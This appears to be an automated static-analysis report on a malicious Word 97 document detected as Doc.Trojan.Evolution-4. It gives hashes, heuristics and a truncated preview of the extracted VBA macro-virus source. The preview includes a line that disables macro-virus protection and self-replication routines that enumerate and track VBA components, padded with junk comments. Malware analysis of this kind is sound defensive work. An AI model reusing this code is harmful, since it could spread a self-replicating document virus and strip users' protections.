Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7bc35627d29881b1…

MALICIOUS

Office (OLE)

Size: 376.5 KB
Created: 1997-09-17 11:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: e3843747d4a128026e6cc3d786e56e79
SHA-1: a26e7647ed839f9fea9b34193b7367bb4a32e5cc
SHA-256: 7bc35627d29881b1a993129fb6968b8549b289aa179a65c26bf09b429bca2202
Risk score: 256

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file exhibits characteristics of legacy macro viruses and contains VBA macros, specifically AutoOpen and Auto_Close, which are commonly used to execute malicious code automatically. ClamAV detections further confirm its malicious nature, classifying it as Doc.Trojan.Evolution-4. The extensive size of the VBA macro source suggests a complex payload, likely designed for execution upon document interaction.

Heuristics (6)

  • ClamAV: Doc.Trojan.Evolution-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Evolution-4
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 700408 bytes
SHA-256: 82cddaf3b28b90f0c09cc732e8c9aa572c01ae882648280b5100f59bc6678c73
Detection
ClamAV: Doc.Trojan.Evolution-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "FHCITRCD"
 '2319651
 'A
 '10:43:11
 'HOME
 '12-13-1999
 '17:19:55
 'Ditry PC
 'Pima County Library
 '12-13-1999
 'A
 '12-13-1999
 '11-19-1999
 'DP
 '17:19:55
 '10:43:11
Public Source As String
 '10:43:11
 '17:19:55
 'Ditry PC
 'Home Office 97
 'DP
 '11-22-1999
 '10:43:11
 '11-10-1999
 '12-13-1999
 '3444285
 '10:43:11
 'HOME
 '8522026
 'A
 '2450732
Public ByeMacro As String
 'Ditry PC
 '11-22-1999
 '10:43:11
 'Home Office 97
 '5990278
 '8253791
 '12-13-1999
 'PCL
 'Ditry PC
 '7991627
 'Ditry PC
 'HOME
 '3454443
 '17:19:55
 '10:43:11
Public Hostinf As Boolean
 '6117274
 'Avert
 '12-13-1999
 'Home Office 97
 '795698
 '17:19:55
 'DP
 'Pima County Library
 '12-13-1999
 'A
 '12-13-1999
 '18:53:43
 'Ditry PC
 '6856834
 '2295135
Public FileInf As Boolean
 '3302932
 'Avert
 'DP
 '7716587
 'DP
 '17:19:55
 '12-13-1999
 'PCL
 '12-13-1999
 'A
 'Ditry PC
 'HOME
 '12-13-1999
 'A
 '10:43:11
Public FExport As String
 '767097
 '11-22-1999
 'Ditry PC
 '18:53:43
 '12-13-1999
 '17:19:55
 '12-13-1999
 '4215783
 '10:43:11
 '5459878
 '12-13-1999
 '2780085
 '12-13-1999
 'A
 'Ditry PC
Public PMExport As String
 '10:43:11
 '17:19:55
 '3044854
 'Home Office 97
 '8497511
 'Avert
 'Ditry PC
 '5350576
 'DP
 '9130505
 'DP
 'HOME
 '12-13-1999
 '11-22-1999
 '6219754
Public PMFile_Yes As Boolean
 '8624507
 '11-22-1999
 '10:43:11
 '11-19-1999
 '1778979
 '11-22-1999
 '12-13-1999
 '7755328
 '10:43:11
 '912536
 'Ditry PC
 'Home Office 97
 '8751503
 '1920333
 'DP
Public Ex_Yes As Boolean
 '10:43:11
 'A
 '10:43:11
 'Home Office 97
 'DP
 'A
 '12-13-1999
 '13:12:27
 'Ditry PC
 '11-22-1999
 'DP
 '18:53:43
 '10:43:11
 '11-22-1999
 'DP
Public Filename As String
 '12-13-1999
 '11-22-1999
 '12-13-1999
 '18:53:43
 '10:43:11
 '9519665
 'DP
 'Pima County Library
 'Ditry PC
 'A
 'DP
 'HOME
 'DP
 '17:19:55
 '9632303
Public FileID As String
 'Ditry PC
 'Avert
 '10:43:11
 'Home Office 97
 '10:43:11
 '5332882
 '10:43:11
 'Pima County Library
 '10:43:11
 'Avert
 '12-13-1999
 'Home Office 97
 '12-13-1999
 '6598756
 'Ditry PC
Public FileID2 As String
 '3688006
 'Avert
 '12-13-1999
 '18:53:43
 '10:43:11
 '17:19:55
 '10:43:11
 '11-10-1999
 '10:43:11
 '1662255
 'Ditry PC
 'HOME
 '4953880
 '7114912
 '7231637
Public Virname As String
 'Ditry PC
 '11-22-1999
 'Ditry PC
 '18:53:43
 'DP
 '17:19:55
 'Ditry PC
 '13:12:27
 '10:43:11
 '17:19:55
 'DP
 '11-19-1999
 'DP
 '11-22-1999
 'Ditry PC
Public FC_There As Boolean
 '10:43:11
 'A
 '12-13-1999
 'Home Office 97
 '12-13-1999
 '11-22-1999
 '10:43:11
 '13:12:27
 'DP
 '7241908
 '2037057
 'HOME
 '3171850
 'Avert
 '5576602
Public FO_There As Boolean
 'DP
 '396380
 'Ditry PC
 '11-19-1999
 '10:43:11
 '5722042
 'Ditry PC
 '7882324
 'DP
 'Avert
 '10:43:11
 '18:53:43
 '5703598
 'A
 'DP
Public FP_There As Boolean
 '3429928
 '11-22-1999
 '12-13-1999
 'Home Office 97
 'Ditry PC
 'A
 'DP
 'PCL
 'DP
 '17:19:55
 '1025175
 '11-19-1999
 '10:43:11
 'Avert
 'Ditry PC
Public FN_There As Boolean
 '7358633
 'A
 '10:43:11
 'HOME
 'DP
 '3059211
 '12-13-1999
 '5608654
 'Ditry PC
 'A
 '12-13-1999
 '5442916
 'DP
 '17:19:55
 '10:43:11
Public FS_There As Boolean
 '10:43:11
 '17:19:55
 '10:43:11
 '7974664
 'DP
 '11-22-1999
 'Ditry PC
 '11-10-1999
 '10:43:11
 '2051415
 '10:43:11
 'HOME
 '640101
 '17:19:55
 '10:43:11
Public FSA_There As Boolean
 'DP
 '11-22-1999
 '10:43:11
 'HOME
 '10:43:11
 '17:19:55
 '10:43:11
 '11-10-1999
 '1905975
 'A
 '12-13-1999
 'HOME
 '12-13-1999
 '8249705
 'DP
Public VrusName As String
 '10:43:11
 'Avert
 '9501222
 'Home Office 97
 '10:43:11
 'Avert
 'DP
 'Pima County Library
 '5834680
 '7217393
 '10:43:11
 '18:53:43
 'Ditry PC
 '9622146
 'Ditry PC
Public Armor As Boolean
 '1156257
 '17:19:55
 'Ditry PC
 '18:53:43
 '7485629
 'A
 '17378
 'PCL
 'DP
 'Avert
 '8235347
 '6577708
 '10:43:11
 '17:19:55
 '10:43:11
Function Source_Check()
 '3298846
 '17:19:55
 '12-13-1999
 '379418
 '2422131
 'A
 '12-13-1999
 '3203901
 '12-13-1999
 '9749142
 'Ditry PC
 'Home Office 97
 'DP
 'A
 'DP
On Error Resume Next
 '12-13-1999
 'Avert
 '12-13-1999
 'HOME
 'Ditry PC
 '17:19:55
 'DP
 '11-10-1999
 'Ditry PC
 'Avert
 '4310728
 '18:53:43
 '9890381
 '11-22-1999
 'Ditry PC
Application.EnableCancelKey = wdCancelDisabled
 '10:43:11
 'A
 'Ditry PC
 '11-19-1999
 '3561010
 'A
 '4695802
 '11-10-1999
 '7100555
 '11-22-1999
 '10:43:11
 '5180752
 'DP
 'A
 'Ditry PC
If MacroContainer = NormalTemplate Then Source = "Host":  Exit Function
 'DP
 '6078515
 '10:43:11
 'Home Office 97
 'DP
 '11-22-1999
 '7227551
 '9537359
 'DP
 'A
 'Ditry PC
 '6446626
 'DP
 '888021
 'Ditry PC
If MacroContainer = ActiveDocument Then Source = "File"
 '12-13-1999
 '17:19:55
 '9763385
 '11-19-1999
 '12-13-1999
 '629943
 '1029261
 '13:12:27
 '12-13-1999
 'Avert
 'Ditry PC
 'Home Office 97
 '6092758
 '6959315
 'DP
End Function
 '10:43:11
 '9491064
 '8108351
 'HOME
 'DP
 'A
 '4437724
 '2200190
 '6969473
 '11-22-1999
 'DP
 '11-19-1999
 '12-13-1999
 'A
 '4826884
Function Self_Recognition()
 'DP
 '4685644
 '12-13-1999
 'HOME
 '12-13-1999
 '11-22-1999
 '10:43:11
 'Pima County Library
 '9374225
 '8094107
 '10:43:11
 'HOME
 '10:43:11
 '1895817
 'DP
On Error Resume Next
 'DP
 'Avert
 '8239433
 'Home Office 97
 '10:43:11
 '11-22-1999
 'DP
 '11-10-1999
 '2032971
 '17:19:55
 'Ditry PC
 'HOME
 '10:43:11
 'A
 '6842477
Application.EnableCancelKey = wdCancelDisabled
 'DP
 '11-22-1999
 '10:43:11
 'HOME
 'Ditry PC
 '11-22-1999
 '513105
 'PCL
 '12-13-1999
 '11-22-1999
 '12-13-1999
 'Home Office 97
 'Ditry PC
 'Avert
 '2295135
Open "C:\windows\system\vnames.cpl" For Input As #1
 '3302932
 '4554562
 'DP
 '8748898
 'DP
 'Avert
 '12-13-1999
 '1188308
 '12-13-1999
 'Avert
 'Ditry PC
 '1153652
 '12-13-1999
 '9364068
 '10:43:11
Do
 '767097
 '17:19:55
 'Ditry PC
 '18:53:43
 '12-13-1999
 'A
 '12-13-1999
 'PCL
 '10:43:11
 '17:19:55
 '12-13-1999
 '11-19-1999
 '12-13-1999
 '11-22-1999
 'Ditry PC
Line Input #1, Virname
 '10:43:11
 '5435363
 '3044854
 'Home Office 97
 '8497511
 '7967111
 'Ditry PC
 '2327186
 'DP
 'A
 'DP
 '11-19-1999
 '12-13-1999
 '2280891
 '6219754
For Z = 1 To ActiveDocument.VBProject.VBComponents.Count
 '8624507
 'Avert
 '10:43:11
 '18:53:43
 '1778979
 '7086311
 '12-13-1999
 '13:12:27
 '10:43:11
 '11-22-1999
 'Ditry PC
 '18:53:43
 '8751503
 '6701237
 'DP
               If ActiveDocument.VBProject.VBComponents(Z).Name <> "ThisDocument" Then
 '10:43:11
 '9359982
 '10:43:11
 '1280648
 'DP
 '3288688
 '12-13-1999
 'PCL
 'Ditry PC
 'Avert
 'Ditry PC
 'HOME
 '12-13-1999
 '11-22-1999
 'Ditry PC
    If Virname = ActiveDocument.VBProject.VBComponents(Z).Name Then GoTo lost
 'DP
 '6828233
 'DP
 'HOME
 '12-13-1999
 '11-22-1999
 'Ditry PC
 '11-10-1999
 '2241685
 '3030610
 'Ditry PC
 '18:53:43
 '10:43:11
 'Avert
 'Ditry PC
    If Virname <> ActiveDocument.VBProject.VBComponents(Z).Name Then GoTo newname
 '5912312
 '5566445
 '12-13-1999
 'HOME
 '12-13-1999
 'A
 '12-13-1999
 '13:12:27
 '10:43:11
 'A
 'DP
 '11-19-1999
 '8702139
 'Avert
 'DP
newname:
 'DP
 '17:19:55
 '3511646
 'Home Office 97
 '12-13-1999
 'A
 '6301472
 '13:12:27
 'DP
 'Avert
 '10:43:11
 'HOME
 'Ditry PC
 '17:19:55
 '2114689
Close #1
 'Ditry PC
 '11-22-1999
 '3380564
 '18:53:43
 'Ditry PC
 'A
 'Ditry PC
 'PCL
 '8444061
 '3292774
 'DP
 'HOME
 'DP
 '4300570
 '12-13-1999
Open "C:\windows\system\vnames.cpl" For Append As #1
 'Ditry PC
 '5562359
 '10:43:11
 '11-19-1999
 '12-13-1999
 '11-22-1999
 '10:43:11
 '2454182
 '12-13-1999
 '17:19:55
 '10:43:11
 '11-19-1999
 '6170390
 'Avert
 '7178187
    Print #1, ActiveDocument.VBProject.VBComponents(Z).Name
 '2503849
 '17:19:55
 '12-13-1999
 'HOME
 '10:43:11
 '17:19:55
 '12-13-1999
 'PCL
 'Ditry PC
 '17:19:55
 '10:43:11
 'HOME
 'Ditry PC
 'A
 'DP
      Close #1
 '9841017
 '11-22-1999
 'Ditry PC
 'Home Office 97
 '10:43:11
 '11-22-1999
 '10:43:11
 '11-10-1999
 '12-13-1999
 '17:19:55
 '8833221
 'HOME
 '10:43:11
 '17:19:55
 '12-13-1999
        End If
 'Ditry PC
 'A
 'DP
 '2157363
 '5031512
 '11-22-1999
 'Ditry PC
 '13:12:27
 '12-13-1999
 'A
 '12-13-1999
 'HOME
 '12-13-1999
 'Avert
 'Ditry PC
    If ActiveDocument.VBProject.VBComponents(Z).Name = "ThisDocument" Then GoTo lost
 '4646438
 'A
 '12-13-1999
 'HOME
 '10:43:11
 'Avert
 '12-13-1999
 'Pima County Library
 '12-13-1999
 'Avert
 'Ditry PC
 '4586631
 '12-13-1999
 'A
 '12-13-1999
lost:
 '12-13-1999
 '2153895
 '10:43:11
 'HOME
 '12-13-1999
 'Avert
 'DP
 '11-10-1999
 '10:43:11
 'Avert
 'Ditry PC
 '5725509
 '12-13-1999
 'Avert
 '10:43:11
Next Z
 'Ditry PC
 'Avert
 '12-13-1999
 '18:53:43
 'Ditry PC
 'Avert
 '10:43:11
 'PCL
 '12-13-1999
 '11-22-1999
 '12-13-1999
 '18:53:43
 '848815
 '9232986
 '10:43:11
Loop Until EOF(1)
 'DP
 'A
 '7436265
 '11-19-1999
 'DP
 '11-22-1999
 'Ditry PC
 'PCL
 '975811
 '4296484
 '10:43:11
 '18:53:43
 'Ditry PC
 'Avert
 '12-13-1999
Close #1
 '12-13-1999
 'Avert
 'Ditry PC
 '18:53:43
 'Ditry PC
 '11-22-1999
 'DP
 '11-10-1999
 '10:43:11
 '17:19:55
 'DP
 'HOME
 'DP
 '11-22-1999
 'DP
Dim Lib
 '1106893
 'A
 'Ditry PC
 'HOME
 'DP
 '17:19:55
 'DP
 'PCL
 '4904516
 'Avert
 '5785316
 '9523132
 '9968013
 '11-22-1999
 'DP
Open "C:\windows\system\vnames.cpl" For Input As #1
 '6043394
 '17:19:55
 '99096
 '11-19-1999
 '10:43:11
 'Avert
 '10:43:11
 'PCL
 '10:43:11
 '11-22-1999
 '10:43:11
 '18:53:43
 'Ditry PC
 '17:19:55
 '12-13-1999
Do
 'Ditry PC
 'A
 '6039308
 'Home Office 97
 '12-13-1999
 'Avert
 'Ditry PC
 '11-10-1999
 '10:43:11
 'Avert
 '10:43:11
 '11-19-1999
 'Ditry PC
 '11-22-1999
 '7305183
Line Input #1, Virname
 '9582939
 'A
 '10:43:11
 'HOME
 'Ditry PC
 'Avert
 'DP
 'Pima County Library
 '10:43:11
 'A
 'Ditry PC
 'HOME
 'DP
 '4558648
 '1233889
For Lib = 1 To NormalTemplate.VBProject.VBComponents.Count
 '10:43:11
 '5693441
 'Ditry PC
 '11-19-1999
 '4519442
 '8098193
 '8575143
 'PCL
 '10:43:11
 '17:19:55
 '12-13-1999
 'HOME
 '10:43:11
 'Avert
 '12-13-1999
    If NormalTemplate.VBProject.VBComponents(Lib).Name = "ThisDocument" Then GoTo skip
 'Ditry PC
 'Avert
 'DP
 'HOME
 '10:43:11
 '11-22-1999
 '10:43:11
 '3593061
 'Ditry PC
 '17:19:55
 'DP
 '11-19-1999
 'DP
 '17:19:55
 '12-13-1999
    If NormalTemplate.VBProject.VBComponents(Lib).Name = Virname Then Hostinf = True: GoTo doccheck
 '10:43:11
 '8225189
 '4777520
 '1411730
 '12-13-1999
 'A
 'Ditry PC
 'Pima County Library
 'Ditry PC
 '5951519
 '10:43:11
 '6991383
 '12-13-1999
 '11-22-1999
 '12-13-1999
skip:
 'Ditry PC
 '11-22-1999
 '10:43:11
 'Home Office 97
 'Ditry PC
 'Avert
 '9709936
 '3334983
 '10:43:11
 'A
 '2372767
 '6733305
 '12-13-1999
 '3546766
 '7051191
Next Lib
 'DP
 '11-22-1999
 'DP
 'Home Office 97
 'DP
 '11-22-1999
 '2499763
 '13:12:27
 '10:43:11
 'A
 '10:43:11
 '3062678
 '12-13-1999
 '7090397
 'Ditry PC
Loop Until EOF(1)
 'Ditry PC
 'A
 'DP
 '5594427
 'DP
 '11-22-1999
 '6297386
 '11-10-1999
 '12-13-1999
 '9105990
 '10:43:11
 'HOME
 'Ditry PC
 'Avert
 '8317065
doccheck:
 'DP
 '17:19:55
 '12-13-1999
 '11-19-1999
 'DP
 '17:19:55
 'DP
 'PCL
 '7309269
 '17:19:55
 '10:43:11
 'HOME
 '3765638
 'A
 'Ditry PC
Close #1
 '3507560
 'Avert
 'Ditry PC
 '789008
 'DP
 'Avert
 '10:43:11
 '11-10-1999
 'DP
 'Avert
 '10:43:11
 '11-19-1999
 '10:43:11
 '3161692
 '12-13-1999
Open "C:\windows\system\vnames.cpl" For Input As #1
 '10:43:11
 '11-22-1999
 'DP
 'HOME
 'DP
 '17:19:55
 '12-13-1999
 '6899043
 '5035598
 '17:19:55
 '4773434
 '11-19-1999
 '12-13-1999
 '17:19:55
 '12-13-1999
Do
 'Ditry PC
 '17:19:55
 'DP
 '11-19-1999
 '3638642
 '4427566
 '12-13-1999
 'Pima County Library
 'Ditry PC
 '11-22-1999
 'DP
 'Home Office 97
 'DP
 'A
 '12-13-1999
…